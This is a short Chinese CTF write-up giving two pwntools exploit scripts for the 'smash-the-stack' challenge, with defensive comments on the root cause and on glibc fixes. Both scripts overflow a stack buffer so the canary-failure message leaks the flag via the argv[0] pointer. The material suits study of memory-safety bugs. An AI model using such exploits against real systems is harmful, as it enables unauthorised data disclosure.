根据提示 stderr:本题与 32C3 的 readme 一题思路相同(原理见上一篇),这里贴出两个 exp:
#!/usr/bin/env python
# coding=utf-8
# Write-up script (pwntools) for the "smash-the-stack" CTF challenge.
#
# What it demonstrates: an unbounded write into a stack buffer reaches far
# enough up the stack to replace a saved pointer (named argv_addr by the
# author, presumably the argv[0] slot) with the address of the flag buffer.
# The write-up's hint "stderr" and its reference to 32C3 "readme" suggest the
# flag is then echoed by the stack-protector abort message, which on older
# glibc builds prints the program name taken from argv[0].
#
# Defensive notes:
#   * The root cause is the unchecked input length; a bounded read removes it.
#   * A stack canary stops control-flow hijacking here, but its own error
#     path became the information leak.
#   * Newer glibc releases (2.26 onward, to my knowledge) print "<unknown>"
#     instead of argv[0] in this message, which closes the leak.
#
# NOTE(review): written in Python 2 style. Under Python 3, 'a' * n is str and
# p32() returns bytes, so the concatenation below would raise TypeError.
from pwn import *

# Addresses from the author's analysis of the target binary. Only the
# distance between the two stack addresses matters for the padding length.
FLAG_ADDR = 0x804a060    # flag buffer; fixed address, presumably non-PIE data
BUF_START = 0xffffcee8   # start of the overflowed stack buffer
ARGV_SLOT = 0xffffcfa4   # stack slot holding the pointer that gets replaced

# For a local copy of the binary the author used instead:
#   io = process('./smash-the-stack')
io = remote('hackme.inndy.tw', 7717)

# Filler up to the pointer slot, then the replacement pointer (32-bit LE).
pad_len = ARGV_SLOT - BUF_START
payload = 'a' * pad_len + p32(FLAG_ADDR)

# Wait for the prompt before sending, then hand the session to the user so
# the service's reply can be read.
io.recvuntil('the flag')
io.sendline(payload)
io.interactive()
另一个:
#!/usr/bin/env python
# coding=utf-8
# Second variant of the write-up script for the same challenge (pwntools).
#
# Instead of computing the exact distance from the buffer to the pointer
# slot, the input is simply the flag address repeated many times, so that
# whichever stack slot is reached ends up holding that address. This avoids
# depending on exact stack addresses, which vary with the environment.
#
# Defensive notes: the root cause is still the unchecked input length. The
# large repeat count also shows how far past the buffer the write can run,
# so a length limit on the read is the fix, not the canary alone.
from pwn import *

FLAG_ADDR = 0x804A060   # flag buffer; fixed address, presumably non-PIE data
REPEAT = 0x300          # number of 4-byte copies sent (0x300 * 4 = 3072 bytes)

io = remote("hackme.inndy.tw", 7717)

# Wait for the prompt line, then send the repeated 32-bit little-endian
# address and hand the session to the user to read the reply.
io.recvuntil("the flag\n")
io.sendline(p32(FLAG_ADDR) * REPEAT)
io.interactive()